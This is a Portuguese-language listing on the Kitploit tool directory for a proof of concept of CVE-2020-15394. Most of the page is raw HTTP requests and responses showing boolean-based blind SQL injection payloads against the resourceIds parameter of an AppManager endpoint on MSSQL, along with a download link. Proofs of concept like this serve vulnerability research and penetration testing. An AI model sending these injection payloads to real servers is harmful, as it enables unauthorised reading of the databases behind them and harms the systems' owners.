Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-15394-PoC — Prova de conceito CVE | Kitploit
Ferramentas/GitHubGitHub/trungtin1998/cve-2020-15394-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubtrungtin1998/cve-2020-15394-poc

CVE-2020-15394-PoC

Prova de conceito CVE

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-15394

  • SGBD: MSSQL
  • Condição TRUE na consulta SQL
root@kitploit:~
POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=1)+THEN+1+ELSE+1/0+END)=1--
root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID_APM_80=123; Path=/; Secure; HttpOnly
Content-Type: text/plain;charset=UTF-8
Content-Length: 57
Date: Wed, 24 Nov 2021 09:39:56 GMT

1) AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 1/0 END)=1--
  • Condição FALSE na consulta SQL
root@kitploit:~
POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=0)+THEN+1+ELSE+1/0+END)=1--
root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID_APM_80=123; Path=/; Secure; HttpOnly
Content-Type: text/plain;charset=UTF-8
Content-Length: 2
Date: Wed, 24 Nov 2021 09:44:04 GMT

Baixar ferramenta